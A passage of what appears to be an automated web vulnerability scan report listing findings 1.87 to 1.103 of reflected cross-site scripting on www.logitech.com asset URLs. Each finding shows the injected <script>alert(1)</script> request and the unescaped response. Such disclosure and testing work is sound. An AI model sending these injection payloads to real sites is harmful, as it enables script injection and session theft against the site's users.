Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c2207</script><script>alert(1)</script>faa6bb4caa8/33048/2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c2207</script><script>alert(1)</script>faa6bb4caa8/33048/2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DC
...[SNIP]...

1.87. http://www.logitech.com/assets/33897/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33897/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86983"><script>alert(1)</script>29194f686f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /86983"><script>alert(1)</script>29194f686f8/33897/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="86983"><script>alert(1)</script>29194f686f8/33897">
...[SNIP]...

1.88. http://www.logitech.com/assets/33897/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33897/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e93</script><script>alert(1)</script>a23b9d258c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d7e93</script><script>alert(1)</script>a23b9d258c7/33897/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d7e93</script><script>alert(1)</script>a23b9d258c7/33897' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.89. http://www.logitech.com/assets/33900/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33900/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fcfb</script><script>alert(1)</script>eb04cae4f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2fcfb</script><script>alert(1)</script>eb04cae4f34/33900/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','2fcfb</script><script>alert(1)</script>eb04cae4f34/33900' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.90. http://www.logitech.com/assets/33900/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33900/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb57a"><script>alert(1)</script>cd222b0b38d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eb57a"><script>alert(1)</script>cd222b0b38d/33900/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="eb57a"><script>alert(1)</script>cd222b0b38d/33900">
...[SNIP]...

1.91. http://www.logitech.com/assets/33903/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33903/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33fb8"><script>alert(1)</script>4e64bd8aed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /33fb8"><script>alert(1)</script>4e64bd8aed4/33903/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="33fb8"><script>alert(1)</script>4e64bd8aed4/33903">
...[SNIP]...

1.92. http://www.logitech.com/assets/33903/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33903/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7a0</script><script>alert(1)</script>898a08fcb2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c7a0</script><script>alert(1)</script>898a08fcb2c/33903/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4c7a0</script><script>alert(1)</script>898a08fcb2c/33903' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.93. http://www.logitech.com/assets/34007/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34007/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f88bd</script><script>alert(1)</script>05edf719c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f88bd</script><script>alert(1)</script>05edf719c3b/34007/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f88bd</script><script>alert(1)</script>05edf719c3b/34007' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.94. http://www.logitech.com/assets/34007/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34007/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a148"><script>alert(1)</script>c5b1e6f43aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /8a148"><script>alert(1)</script>c5b1e6f43aa/34007/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="8a148"><script>alert(1)</script>c5b1e6f43aa/34007">
...[SNIP]...

1.95. http://www.logitech.com/assets/34067/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34067/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992ec"><script>alert(1)</script>616f8778c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /992ec"><script>alert(1)</script>616f8778c55/34067/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="992ec"><script>alert(1)</script>616f8778c55/34067">
...[SNIP]...

1.96. http://www.logitech.com/assets/34067/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34067/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33442</script><script>alert(1)</script>4d901d526b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /33442</script><script>alert(1)</script>4d901d526b7/34067/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','33442</script><script>alert(1)</script>4d901d526b7/34067' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.97. http://www.logitech.com/assets/5848/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/5848/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6376</script><script>alert(1)</script>c9d20560f5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a6376</script><script>alert(1)</script>c9d20560f5f/5848/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a6376</script><script>alert(1)</script>c9d20560f5f/5848' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.98. http://www.logitech.com/assets/5848/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/5848/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7812"><script>alert(1)</script>98a80d4228f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c7812"><script>alert(1)</script>98a80d4228f/5848/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c7812"><script>alert(1)</script>98a80d4228f/5848">
...[SNIP]...

1.99. http://www.logitech.com/assets/6277/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/6277/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15419</script><script>alert(1)</script>1c4abb09d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15419</script><script>alert(1)</script>1c4abb09d95/6277/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','15419</script><script>alert(1)</script>1c4abb09d95/6277' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.100. http://www.logitech.com/assets/6277/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/6277/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb066"><script>alert(1)</script>73c2f22eb06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eb066"><script>alert(1)</script>73c2f22eb06/6277/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="eb066"><script>alert(1)</script>73c2f22eb06/6277">
...[SNIP]...

1.101. http://www.logitech.com/assets/7167/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/7167/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfa4</script><script>alert(1)</script>bc7c7e40a0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4cfa4</script><script>alert(1)</script>bc7c7e40a0e/7167/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4cfa4</script><script>alert(1)</script>bc7c7e40a0e/7167' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.102. http://www.logitech.com/assets/7167/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/7167/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806c7"><script>alert(1)</script>c1d6c0950cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /806c7"><script>alert(1)</script>c1d6c0950cc/7167/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="806c7"><script>alert(1)</script>c1d6c0950cc/7167">
...[SNIP]...

1.103. http://www.logitech.com/assets/9653/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/9653/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c82"><script>alert(1)</script>9d1a97b66bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /14c82"><script>alert(1)</script>9d1a97b66bc/9653/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="14c82"><script>alert(1)</script>9d1a97b66bc/9653">
...[SNIP]...

